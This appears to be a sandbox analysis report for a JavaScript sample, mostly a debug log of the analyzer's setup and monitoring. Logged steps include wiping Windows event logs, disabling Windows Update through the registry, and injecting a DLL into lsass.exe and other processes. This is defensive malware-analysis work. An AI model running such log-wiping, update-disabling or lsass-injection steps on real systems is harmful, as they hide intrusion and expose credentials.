| Category | Package | Started | Completed | Duration | Options | Log(s) | MalScore |
|---|---|---|---|---|---|---|---|
| FILE | js | 2025-12-08 16:32:32 | 2025-12-08 16:35:55 | 203 seconds | Show Options | Show Analysis Log | 4.4 |
vnc_port=5902
2025-12-06 09:30:10,735 [root] INFO: Date set to: 20251208T08:31:09, timeout set to: 180
2025-12-08 08:31:09,000 [root] DEBUG: Starting analyzer from: C:\tmpxury4kjh
2025-12-08 08:31:09,000 [root] DEBUG: Storing results at: C:\izVIbM
2025-12-08 08:31:09,000 [root] DEBUG: Pipe server name: \\.\PIPE\kpRijuZscx
2025-12-08 08:31:09,000 [root] DEBUG: Python path: C:\Python38
2025-12-08 08:31:09,000 [root] INFO: analysis running as an admin
2025-12-08 08:31:09,000 [root] INFO: analysis package specified: "js"
2025-12-08 08:31:09,000 [root] DEBUG: importing analysis package module: "modules.packages.js"...
2025-12-08 08:31:09,015 [root] DEBUG: imported analysis package "js"
2025-12-08 08:31:09,015 [root] DEBUG: initializing analysis package "js"...
2025-12-08 08:31:09,015 [lib.common.common] INFO: wrapping
2025-12-08 08:31:09,015 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:09,015 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\testjs.js
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL_64 option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader_64 option
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 08:31:09,062 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 08:31:09,281 [modules.auxiliary.disguise] INFO: Disguising GUID to 4cd86de3-d3ab-4183-8f30-4cb63b155e73
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 08:31:09,281 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 08:31:09,281 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 08:31:09,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 08:31:09,375 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 08:31:09,421 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 08:31:09,421 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 08:31:09,421 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 08:31:09,421 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 08:31:09,421 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 08:31:09,421 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 08:31:09,421 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 392
2025-12-08 08:31:09,421 [lib.api.process] INFO: Monitor config for <Process 392 lsass.exe>: C:\tmpxury4kjh\dll\392.ini
2025-12-08 08:31:09,421 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 08:31:09,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:09,437 [root] DEBUG: Loader: Injecting process 392 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,453 [root] DEBUG: 392: Python path set to 'C:\Python38'.
2025-12-08 08:31:09,453 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:09,468 [root] DEBUG: 392: TLS secret dump mode enabled.
2025-12-08 08:31:09,468 [root] DEBUG: 392: Monitor initialised: 32-bit capemon loaded in process 392 at 0x6c9a0000, thread 3136, image base 0x570000, stack from 0x1066000-0x1070000
2025-12-08 08:31:09,468 [root] DEBUG: 392: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 08:31:09,468 [root] DEBUG: 392: Hooked 5 out of 5 functions
2025-12-08 08:31:09,468 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:09,468 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 08:31:09,468 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,484 [lib.api.process] INFO: Injected into 32-bit <Process 392 lsass.exe>
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 08:31:09,484 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 08:31:09,484 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 08:31:09,484 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 08:31:09,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 08:31:09,531 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 08:31:09,562 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 08:31:09,562 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 08:31:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 08:31:09,593 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 08:31:09,609 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 08:31:09,625 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 08:31:09,640 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 08:31:09,640 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 08:31:09,656 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 08:31:09,687 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 08:31:09,703 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 08:31:09,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 08:31:09,718 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,718 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 08:31:09,734 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 08:31:09,765 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 08:31:09,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 08:31:09,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 08:31:09,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 08:31:09,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 08:31:09,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 08:31:09,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 08:31:09,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 08:31:09,890 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 08:31:09,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 08:31:09,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 08:31:09,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 08:31:09,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 08:31:10,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 08:31:10,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 08:31:10,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 08:31:10,156 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 08:31:10,171 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 08:31:10,187 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 08:31:10,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 08:31:10,218 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 08:31:10,234 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 08:31:10,249 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 08:31:10,265 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 08:31:10,281 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 08:31:10,296 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 08:31:10,328 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 08:31:10,343 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 08:31:10,359 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 08:31:10,375 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 08:31:10,390 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 08:31:14,656 [root] INFO: Restarting WMI Service
2025-12-08 08:31:16,687 [root] DEBUG: package modules.packages.js does not support configure, ignoring
2025-12-08 08:31:16,687 [root] WARNING: configuration error for package modules.packages.js: error importing data.packages.js: No module named 'data.packages'
2025-12-08 08:31:16,687 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:16,687 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\wscript.exe" with arguments ""C:\Users\user\AppData\Local\Temp\testjs.js"" with pid 3016
2025-12-08 08:31:16,687 [lib.api.process] INFO: Monitor config for <Process 3016 wscript.exe>: C:\tmpxury4kjh\dll\3016.ini
2025-12-08 08:31:16,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:16,703 [root] DEBUG: Loader: Injecting process 3016 (thread 3052) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:31:16,703 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [lib.api.process] INFO: Injected into 32-bit <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [lib.api.process] INFO: Successfully resumed <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,703 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: wscript hook set enabled
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled 41 rule files
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled rules saved to file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Monitor initialised: 32-bit capemon loaded in process 3016 at 0x6c9a0000, thread 3052, image base 0x2e0000, stack from 0x206000-0x210000
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Commandline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\testjs.js"
2025-12-08 08:31:18,718 [root] DEBUG: 3016: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Hooked 611 out of 613 functions
2025-12-08 08:31:18,718 [root] DEBUG: 3016: WoW64 not detected.
2025-12-08 08:31:18,734 [root] INFO: Loaded monitor into process with pid 3016
2025-12-08 08:31:18,734 [root] DEBUG: 3016: caller_dispatch: Added region at 0x002E0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x002E3DA7, thread 3052).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,734 [root] DEBUG: 3016: ProcessImageBase: Main module image at 0x002E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753F0000: C:\Windows\system32\SXS (0x5f000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x73E80000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x6CC90000: C:\Windows\System32\jscript (0xa6000 bytes).
2025-12-08 08:31:18,750 [lib.api.process] INFO: Monitor config for <Process 556 svchost.exe>: C:\tmpxury4kjh\dll\556.ini
2025-12-08 08:31:18,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:18,750 [root] DEBUG: Loader: Injecting process 556 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,765 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,765 [root] DEBUG: 556: parent_has_path: unable to get path for parent process 376
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:31:18,765 [root] DEBUG: 556: Monitor initialised: 32-bit capemon loaded in process 556 at 0x6c9a0000, thread 3376, image base 0xf00000, stack from 0xc36000-0xc40000
2025-12-08 08:31:18,765 [root] DEBUG: 556: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch
2025-12-08 08:31:18,765 [root] DEBUG: 556: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,765 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,765 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,781 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,781 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,781 [root] DEBUG: 556: Hooked 611 out of 613 functions
2025-12-08 08:31:18,781 [root] DEBUG: 556: WoW64 not detected.
2025-12-08 08:31:18,781 [root] INFO: Loaded monitor into process with pid 556
2025-12-08 08:31:18,781 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:18,781 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,781 [lib.api.process] INFO: Injected into 32-bit <Process 556 svchost.exe>
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x75630000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x73AC0000: C:\Windows\system32\MSISIP (0x8000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x72740000: C:\Windows\system32\wshext (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x71CF0000: C:\Windows\system32\scrobj (0x2d000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:31:20,890 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3592, handle 0x5f8: C:\Windows\System32\audiodg.exe
